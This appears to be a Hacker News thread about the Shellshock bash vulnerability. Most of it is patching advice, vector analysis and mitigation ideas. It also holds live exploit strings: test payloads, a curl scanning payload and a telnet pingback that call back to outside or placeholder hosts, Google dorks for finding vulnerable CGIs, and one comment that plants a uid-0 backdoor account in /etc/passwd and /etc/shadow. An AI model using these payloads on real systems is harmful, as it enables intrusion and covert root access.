I'm a bit confused about how to properly patch my mac.

Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

You're correct – you'd need to overwrite /bin/bash (think long and hard about this) to update it before Apple ships an update.

The good news is that as long as you're not running a local server, the vulnerability is pretty limited particularly since even if you did have SSH enabled the exploit would require valid authentication first.

There's some potentially funky stuff there like CUPS, which runs a local daemon that serves binary CGIs (though I think it's bound to localhost by default).


Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.

> Might be wise to turn all network-listening services off that you don't immediately need until a fix is available.

I would go further and suggest that now is an excellent time to ask which of those services you really need to have at all. The default of blocking incoming connections is right for most people, even developers.

At least on linux that's not true as NetworkManager + dhclient is affected through malicious dhcp packets. There could be attack vectors almost everywhere.

Oh, certainly. I was only talking about OS X, which didn't build the DHCP client around a collection of shell scripts for portability.

On OS X, you could see every time a process is invoked like this:

    sudo execsnoop -c bash

On Linux, that requires work which fortunately Brendan Gregg already did:


You could move /bin/bash to another location, and then create a symlink from the Homebrew version to /bin/bash.

Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse

Just did something similar with Ansible, the simple task "apt update_cache=yes pkg=bash state=latest" will do the trick. At least it did for me.

The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929

My findings so far: setting User-Agent to that new string and executing a .cgi script complains about: syntax error near unexpected token `newline' in `#!/bin/bash'. (My speculation is that we are in some kind of parsing context where no newlines are expected; none are given on the example bash -c ... line, but when you actually run a script there will be a newline).

I tried to change this to a Python script and instead use os.popen. Well, Ubuntu /bin/sh is "dash" so that's not affected.

I tried to explicitly call bash via os.popen("bash -c 'some command'") -- no go either, as that bash command started by parsing some /etc/bash.bashrc file and complaining about newlines there.

Finally I used os.popen("bash --norc -c '/tmp/file date'") -- and that ended up running "date > /tmp/file" from the CGI script.

I tried replacing /bin/sh by "bash" instead of dash. That now made the CGI script choke on reading some other RC files due to the unexpected newlines in the context bash starts with.

So the question for me still seems to be: what is the weird context set up by that environment, and what else can you do with it than redirect $1 to $0?

That works for me too. I was first unsure but breaking it up into an export Z=.... and then running bash -c 'echo date' on a separate line seems to execute essentially date > echo.

Can anyone explain what's going on there? Seems like defining a function within a nameless function; how does it end up with this redirect? I'm not sure what the exploitability of this is; is it just essentially $1 > $0?

The redirect at the end of the env var seems to be "remembered" even though the syntax error aborts the function definition, then the first arg is taken as the path to redirect to, and the following args as the command to execute. (I haven't dug into the actual parser, this is just my intuitive understanding.) It does seem to be about like $1 > $0, so not generally exploitable.

Here's an example using it to read files instead of write: https://news.ycombinator.com/item?id=8365205 But still, not as universal of an exploit as the original.

Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something
  else outside your program--at least, not by accident. All command line
  arguments, environment variables, locale information (see perllocale),
  results of certain system calls (readdir(), readlink(), the variable
  of shmread(), the messages returned by msgrcv(), the password,
  gcos and shell fields returned by the getpwxxx() calls), and all
  file input are marked as "tainted".

  Tainted data may not be used directly or indirectly in any command
  that invokes a sub-shell, nor in any command that modifies files,
  directories, or processes, with the following exceptions:

Not true if the perl script calls out to bash (i.e. via system), as it doesn't sanitize the environment:

    $ env x='() { :;}; echo vulnerable' perl -T -e "\$ENV{PATH} = '/bin'; system('ls | cat');"  
    sh: warning: x: ignoring function definition attempt
    sh: error importing function definition for `x'

My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  this is a test

Doesn't OSX ship the 8-year-old bash 3.2 (2006) i.e. the last version available as GPLv2? (Apple hates GPLv3)

For me in 10.9.5:

  $ bash --version
  GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
  Copyright (C) 2007 Free Software Foundation, Inc.

It does. I installed an up-to-date version with homebrew a few months ago, and it was vulnerable as well. After a `brew update && brew upgrade bash` I had the fix installed, though :)

If I remember correctly, Apple stopped updating bash in OS X a long time ago. I wonder if this will get fixed.

My OSX was vulnerable too, but I use Homebrew, and the latest version of bash available via brew update && brew upgrade is patched against this.

If you hadn't already been using Homebrew, though, you will likely need to move /usr/local/bin in front of /usr/bin in your path; otherwise the old bash would still be used.
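The reason PATH order matters for interactive use (but not for #!/bin/bash shebangs, which hardcode the path and ignore PATH entirely) is plain left-to-right lookup. A toy resolver, using throwaway directories rather than the real /bin:

```python
import os
import tempfile

def which(cmd, path_dirs):
    """Return the first executable named cmd along path_dirs, mimicking
    the shell's left-to-right PATH lookup."""
    for d in path_dirs:
        candidate = os.path.join(d, cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None

with tempfile.TemporaryDirectory() as tmp:
    system_bin = os.path.join(tmp, "bin")        # stand-in for /bin
    local_bin = os.path.join(tmp, "local-bin")   # stand-in for /usr/local/bin
    for d in (system_bin, local_bin):
        os.makedirs(d)
        fake = os.path.join(d, "bash")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\n")  # dummy stand-in executable
        os.chmod(fake, 0o755)
    # Homebrew-style fix: list the local dir first so its bash wins.
    first = which("bash", [local_bin, system_bin])
    print(first == os.path.join(local_bin, "bash"))
```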

This is quite a stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com' 
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

Would disabling CGI, e.g. adding "Options -ExecCGI" to httpd.conf for Apache, prevent exploitation via the web server?

    import os
    os.putenv("ANYTHING", "() { :;}; echo bu")
    os.system("bash")

If this works (and it does) that means it's enough for a CGI script to invoke bash. It doesn't even have to be written in bash.

Maybe bash is invoked on some other request path, not just the / which you are scanning.

I would go with /login and such, or write a crawler to parse out where the login/logout URLs are and try those.

It seems like the current patch might not be a complete fix:


I think the default in bash should be to never execute the contents of environment variables (like the restricted shell mode allows). Does anyone know why it allows you to pass in shell functions this way? Does anything use it?

Am I wrong in thinking that seems a bit worse than Heartbleed?

The exploit is worse.

But I'm not sure how a scanner bot would find network accessible bashes to exploit. Seems like basically you need a cgi-bin with bash, and I don't think there's any way to predict a URL that is going to have such a thing.

Now, if there is some popular app that ends up vulnerable (perhaps because it shells out to bash), then that's definitely going to be huge.

But as it is... I'm not sure?

You could search for *.cgi scripts indexed by Google. They may not be written IN Bash but maybe one of them opens up a shell to execute a command. Even if you are not explicitly passing any bad data to it, the environment will be passed and trigger this crazy vulnerability.

Makes sense. This just strikes me as a very flexible exploit.

okay, i was wrong, this is way way worse.

Google inurl:cgi-bin inurl:.sh

Yeah, that makes sense. Did you try it?

Gets me ~6k of hits that have just 'sh' in the URL (without the dot), and are not what we're looking for, mostly forum posts asking about how to make a bash cgi-bin. (Answer from the future: don't).

I _think_ putting quotes around the ".sh" is supposed to force the result to really have the period before the sh in the URL.

inurl:cgi-bin inurl:".sh"

0 hits

    inurl:cgi-bin "inurl:\.sh$"
320k results here. The slash and $ made a difference, but they are not parsed as regex; other chars work too. Not sure what's going on here.

It is far worse in the sense that it can lead to remote code execution. However, the number of vulnerable sites is far, far fewer. Like Heartbleed, this one will likely have a very long tail of systems remaining vulnerable. My guess is we will see this vulnerability used to compromise big targets in the next few months.

What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

See http://seclists.org/oss-sec/2014/q3/651. Can't say I understood much, but the answer I can give is 'likely'.

No, they would need a valid SSH account and password/key.

No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

Update for Ubuntu Server 14.04 is available

From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:

  % E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'
  bash: warning: E: ignoring function definition attempt
  bash: error importing function definition for `E'
Since everyone's favorite example seems to be CGI scripts, doesn't this result in the script having no variable, as opposed to just a text one? Suddenly the script can break because an expected variable is no longer present simply because the input had a certain odd looking form?

In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?

I got tired of the hype. How's the following code for a mitigation?

Basically, if some program does invoke /bin/bash, control first passes to this code, which truncates suspicious environment variables (and dumps messages to the system log if/when it finds anything).

The check should match any variety of whitespace:

    =() {
    = ( ) {

etc. ...but feel free to update it for whatever other stupid things bash allows.

The code is at http://ad5ey.net/bash_shock_fix.c

Simple usage:

    cd /bin
    gcc -std=c11 -Wall -Wextra bash_shock_fix.c -o bash_shock_fix
    mv bash bash.real
    ln -s bash_shock_fix bash

    phoenix(pts/1):~bin# ls -al bash*
    lrwxrwxrwx 1 root root      14 Sep 27 00:23 bash -> bash_shock_fix
    -rwxr-xr-x 1 root root 1029624 Sep 24 14:51 bash.real
    -rwxr-xr-x 1 root root    9555 Sep 27 00:23 bash_shock_fix
    -rw-r--r-- 1 root root    2990 Sep 27 00:23 bash_shock_fix.c


For this to happen, the attacker has to control environment variables, and then a bash shell has to be spawned.

Lots of web stuff spawns shells after setting environment variables from HTTP headers; LC_TIME with some time zone setting might be one.

Am I vulnerable if I'm using the Paperclip gem to manage file uploads on a Rails app? (It internally fires up 'convert' to generate thumbnails, I believe.)

What if there is an HAProxy sitting in front of the Rails app?

We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.

We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo

Please feedback here: https://news.ycombinator.com/item?id=8366643

Has the redhat patch been pushed through centos yet?

Apparently, no. When it does, it should appear at http://lists.centos.org/pipermail/centos-announce/2014-Septe... (if you admin CentOS servers, it can be a good idea to subscribe to that list).

Looks like it works. I guess it is okay that after the close quote the command still runs even though it is not terminated

     env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
     bash: warning: x: ignoring function definition attempt
     bash: error importing function definition for `x'
     this is a test

It's out by now for both Centos 6 and 7. Ironically, their Redhat brethren on the Fedora 20 project haven't released an update yet.

My CentOS now says "ignoring function definition attempt" after the upgrade, so I assume CentOS update is now out.

I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://exploitablehost.com/blah.cgi

My friend tried it on Heroku; it is affected.

Can someone with mod_security test a regex I wrote that should mitigate this? /\(.?\)\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.

Your regex was damaged by HN's comment formatting. To get it to post correctly, put it on a line with four leading spaces.

Repost, because HN "formatted" it for me

I have qualms about Red Hat's fix, because it seems like it would create too many false positives, and additionally looks way too easy to work around just by adding spaces, etc.

Those regexes seem a bit too fragile for my liking. Adding an extra space between the paren and the bracket breaks it, naming the function breaks it, etc. Plus it has a bigger chance of triggering false positives. It's an okay emergency fix, but I'm positive one can do better.
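The fragility is easy to see with two illustrative patterns (neither is the actual mod_security rule). Whether looser spellings actually trigger bash is a separate question, since the import check reportedly matches the exact '() {' prefix, but a filter can be whitespace-tolerant cheaply:

```python
import re

fragile = re.compile(r"\(\) \{")        # demands one exact space
tolerant = re.compile(r"\(\s*\)\s*\{")  # allows any whitespace (or none)

probes = [
    "() { :;}; echo vulnerable",   # canonical payload
    "()  { :;}; echo vulnerable",  # extra space defeats the fragile pattern
    "( ) { :;}; echo vulnerable",  # space inside the parens does too
]
for p in probes:
    print(p, bool(fragile.search(p)), bool(tolerant.search(p)))
```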

Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

    sudo apt-get update
    sudo apt-get --only-upgrade install bash

At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.

Here's an easy to use and reliable scanner to test if your website is vulnerable. http://milankragujevic.com/projects/shellshock/

So basically, turn off AcceptEnv in sshd_config?

Also, don't use bash for running any scripts. You never should anyway; in a sane environment /bin/sh is not bash. In Debian/Ubuntu it is dash, which is not vulnerable. Unfortunately, the Red Hat-derived distros do use bash as the default /bin/sh. In the BSDs it is a standards-compliant POSIX sh too. Bash is for users, not scripts.

> in a sane environment /bin/sh should not be bash

Why, other than it is not the shell of the day?

First, it encourages people to use bash-specific stuff that is non-POSIX. Second, it is a huge bloated bit of code that's OK as a user interface, but scripts should use something more minimal, to avoid this sort of issue.

> scripts should use something that is more minimal. To avoid this sort of issue.

Are you also against Perl and Python or does this scripts should be minimal only apply to bash?

> First it encourages people to use bash specific stuff that is non Posix

That's not a problem for most people.

These are reasons you don't like bash, not reasons to not use bash.

/bin/sh is the shell called by system(3) and used by portable scripts bundled with packages. Those things can't use anything but standard sh anyway, so having them run bash is overkill. "Don't use bash as your /bin/sh" isn't the same as "don't use bash as your interactive shell" or "don't write bash scripts"
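You can see which shell system(3)-style calls use from Python, since os.system and subprocess with shell=True both hand the command line to /bin/sh -c. A small sketch (the output depends on the platform):

```python
import subprocess

# $0 inside the spawned shell reveals which binary ran the command line.
out = subprocess.run("echo $0", shell=True, capture_output=True, text=True)
print(out.stdout.strip())  # typically /bin/sh on Linux, whatever that links to
```

On Red Hat-derived systems that /bin/sh is bash; on Debian/Ubuntu it is dash, which is part of why the same shell-out can be exploitable on one and not the other.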

And don't put #!/bin/bash at the top of your scripts.

And don't shell out in eg. Perl, or PHP, or Python, through bash.

Or just take a patched bash.

> In the BSDs it is a standards compliant posix sh too.

In FreeBSD, it is tcsh in sh mode. Bash does the same too when invoked as sh[0]. It's POSIX compliant with extensions. There's still all the shell's code there, it's just that some of it is switched off by default, or its behaviour modified, to be compliant.

[0] http://www.gnu.org/software/bash/manual/html_node/Bash-POSIX...

Dash sucks, bash rocks. Dash isn't even close to being as capable a shell as Bash.

Anyone able to express how this affects the default client configuration on Mac desktops and servers?

I guess I'll answer one part. If you run this in your terminal:

    $ env x='() { :;}; echo vulnerable' bash -c "echo test"

...you certainly appear to be vulnerable.

But I'm not knowledgeable about all the default scripts that launch things on the Mac. It's unclear to me whether there are any standard processes on OS X that invoke bash.

By the time AcceptEnv has any effect, the user is already logged in and can run whatever they want anyway. If you're allowing untrusted users to authenticate to ssh, then, yeah, sure, but you'd be in a niche (and know it).

Don't forget SSH_ORIGINAL_COMMAND. GitHub and BitBucket had an exciting morning...
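The SSH_ORIGINAL_COMMAND vector can be sketched like this: sshd sets that variable to whatever command line the client requested, so a forced-command wrapper (the pattern git hosting services use) hands attacker-controlled bytes to any bash it spawns. Here the sshd step is simulated by exporting the variable ourselves; the payload string and the wrapper's output are illustrative:

```shell
# Simulate sshd exporting the client's requested command line:
export SSH_ORIGINAL_COMMAND='() { :;}; echo payload ran'
# An unpatched bash parses that "function" during startup and executes
# the trailing command; a patched bash treats it as an ordinary string.
bash -c 'echo wrapper handling git request'
```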

I don't think so. From what I've been reading it can be exploited via http requests. I'm sure a metasploit script is right around the corner.

Edit: oh, looks like only mod_cgi-related stuff is.. that's good then, sort of

It can potentially be exploited via anything that shells out to bash with an environment containing variables whose values ultimately come from an untrusted source.

mod_cgi is just one of the most obvious attack vectors.

Any software where adversary-controlled input can set environment variables which then execs bash is affected. mod_cgi is just really easy to exploit.
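To see why mod_cgi is so easy: the web server copies request headers into HTTP_* environment variables (per the CGI spec) before exec'ing the script, so a crafted User-Agent header arrives exactly like this. Simulated below with a harmless payload; the echoed response text is illustrative:

```shell
# What the CGI script's environment looks like when the attacker sends
# "User-Agent: () { :;}; echo pwned" -- on an unpatched bash the payload
# runs before the script's real work does.
HTTP_USER_AGENT='() { :;}; echo pwned' bash -c 'echo serving the response'
```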

For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

    knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run the same firmware for years. The bigger routers get updates, but the smaller ones and the modems don't.


Also: I was not able to test it yet since I am still on the road, but I believe the Cisco AnyConnect VPN client OS-detection is affected.

Interestingly enough, the ancient bash version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test

Since other people are reporting that their copies of bash 3.2.51 are vulnerable, I suspect that the version of bash that is currently running in that terminal is 3.2.51 and vulnerable, but the version of bash that you are invoking from that vulnerable version of bash is not.

In other words, I suspect that:

    $ echo $BASH_VERSION

    $ bash --version
Will report different version numbers.

If you start a new terminal and try `echo $BASH_VERSION`, you will probably see a different version as well.
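The mismatch being described is easy to observe: `$BASH_VERSION` is expanded by the shell you are typing into, while `bash --version` reports whichever bash is first on `$PATH`. On a box with a Homebrew or MacPorts bash the two can disagree:

```shell
# Version of a freshly launched bash (i.e. the one found on $PATH):
bash -c 'echo "child bash is: $BASH_VERSION"'
# Same binary reporting itself:
bash --version | head -n 1
```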

Yes - the shell currently running is probably the user's login shell, and the shell in e.g. /usr/local/bin/bash was probably installed by Homebrew or MacPorts.

That could be the reason. I renamed /bin/bash (version 3.2) to /bin/bash3 and copied the /usr/local/bin/bash that I built myself to /bin/bash, effectively making bash 4.3 the default login and system shell.

I started bash 3.2 from bash 4.3, so that could be the reason why it is not vulnerable as a child process.

Excellent insight!

That's ... weird, since the phrase "ignoring function definition attempt" wasn't added to bash 3.2 until today, with patch level 52.


Your paste indicates patch level 51.

The phrase in question doesn't appear on the internet much at all before today.


I presume that the one search result we see is due to a server that has an incorrect clock (or a time machine).

Hmm, I do see "vulnerable" print when I run that code on Mac OS X 10.9.5 with bash 3.2.51(1)-release.

I have same bash version and yet mine is vulnerable on OS X 10.10.

So proud of myself; my Python has env={} in the call to Popen().

The ultimate whitelist.
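The shell analogue of `Popen(..., env={})` is `env -i`, which starts the child with an empty environment so nothing inherited (malicious or otherwise) survives into it. A small sketch, with `MYSECRET` as a hypothetical stand-in for an attacker-supplied variable:

```shell
# MYSECRET is set for env(1), but `env -i` clears the environment before
# exec'ing bash, so the child never sees it:
MYSECRET=hunter2 env -i bash -c 'echo "MYSECRET is [$MYSECRET]"'
```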

And they're executed with sudo, but sudo strips env vars containing functions on the machines I use. The oldest is RHEL5.

Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash

env x='() { :;}; echo "johndoe:x:0:0::/root:/bin/sh" >>/etc/passwd' bash -c "echo this is just a test"

env x='() { :;}; echo "johndoe:\$6\$eM5eLwRC\$eZhb4x7sf1ctGjN1fXrpsusRHRKTHf/E15OA2Nr4TdTF9F0SS4ousy3WrPCI2ofdNoAonRnNPQ7Ja3FQ/:15997:0:99999:7:::" >>/etc/shadow' bash -c "echo this is just a test"


but this only works as root :/ and johndoe xD

Saved a lot of time again today with Salt!

    $ salt '*' pkg.install bash refresh=True

and then check for the right version:

    $ salt '*' pkg.version bash

Looks like Raspbian has updated its bash package with the fix, so my Raspberry Pi is safe.

So if a machine is not running a web server, does that mean that machine is not vulnerable?

It might not be vulnerable, but any context where a user can pass environment variables might be dangerous.

Eg, if you allow ANY environment variables in SSH rsync-only logins, or pass on any variables (for good or bad) in sudo scripts, etc.
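For the sudo case, the relevant knobs look like this (an illustrative /etc/sudoers fragment; the env_keep list is only an example, not a recommendation):

```
# Strip the invoking user's environment before running the command...
Defaults env_reset
# ...and whitelist only what is explicitly needed:
Defaults env_keep = "LANG LC_ALL TERM"
```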

No, all sorts of other network-facing systems can be vulnerable. Anything that ends up shelling out might pass some environment variables causing the problem. These things pop up in surprising places.

No. Apparently ssh might be vulnerable.

Saucy wasn't patched by the time I did a do-release-upgrade a while ago.

Don't forget to update your docker containers and restart them.

The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025

All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?

Though it's no doubt rickety, conceptually I really like CGI. Talk about loose coupling.

FreeBSD appears to be affected.

...if you've installed bash from ports. The base system doesn't appear to be affected.

The base FreeBSD installation comes with 2 shells - tcsh and sh (not bash!). However many do install bash.


A default installation of FreeBSD is not affected, as FreeBSD does not have bash installed by default.

Someone please ELI5 (Explain Like I'm 5)?

You're very likely pwned. Upgrade immediately.

Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png

You're not funny.

I have a feeling this is blown out of proportion. Who's running bash setuid exactly? Right. Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

Google brings up 410 .bash CGIs. Every one of them is almost guaranteed to be vulnerable at this point. Of the 1.2 million .sh CGIs, some are surely vulnerable. By this time, many of them are already in the process of being owned.

CGIs are likely the smallest piece of the vulnerable hosts here. This is going to stick around as a local vulnerability on the plentiful supply of under-patched Linux boxes for a long time.

That's a really small number of servers, actually.. I mean, people get owned every day, every minute. There are a bunch of more easily exploitable local bugs that actually elevate your privileges.

This one bug DOES NOT elevate privileges. You need a service that passes unsanitized env vars (unchecked user input) to bash under a different user ID than yours.

GitHub? I'm reminded of


Of course that was fixed a long time ago, but I wonder what other systems are just a thin veneer over pretending the user controls a shell.

Even if the malicious code doesn't have superuser context, it can do damage to whatever context it is running under. If it's running as www-data, it can trash all your www-data-owned files. Or send your www-data-owned password files somewhere, etc. Unprivileged code can also attack other systems (firewalls permitting); you don't have to be root on system A, to be part of a bot net which attacks system B. Denial-of-service havok can be wreaked from a regular user context, too. Not to mention privacy violations. Pretty much all browser-related security and privacy issues are user space!

As I understand this, any CGI script could be affected, even one written in a different language, if it in turn does an os.system() call (or equivalent). More info here: https://securityblog.redhat.com/2014/09/24/bash-specially-cr... The permissions would only be those of the web server user, but that still allows all sorts of dangerous things to be run (resource exhaustion, attacking remote machines, downloading code and running it).
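The point about other languages can be sketched end to end: a CGI written in Perl, Python, or PHP inherits the HTTP_* variables from the web server and passes them straight through when it shells out (os.system, system(), backticks). The sshd/web-server step is simulated here with a plain export; the payload and output strings are illustrative:

```shell
# A crafted request header, as it would sit in the CGI's environment:
export HTTP_COOKIE='() { :;}; echo owned'
# Stand-in for the script's shell-out (e.g. os.system in Python) -- the
# child bash inherits HTTP_COOKIE and, if unpatched, runs the payload:
bash -c 'echo thumbnail resized'
```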

You would still need to be able to pass arbitrary data to the bash command, and if your php (or whatever) script does that, you have a lot of other potential problems to worry about.

RedHat security says:

> PHP scripts executed with mod_php are not affected even if they spawn subshells.


Because of the way CGI works, you could just set a User-Agent or other HTTP header to contain an 'rm' or 'nc' command, or something to download and run an attack tool. E.g. you could run netcat to listen on a port, or connect out to an attacker's system, providing a connection into an otherwise firewalled database server.

Yes, you're right. We have Perl running on our server, and I just verified that it is vulnerable if any shell scripts are run from Perl. However, I just switched on mod_perl and verified that it is now not affected. (According to Red Hat, mod_perl and PHP are not affected, but it's good to verify.)
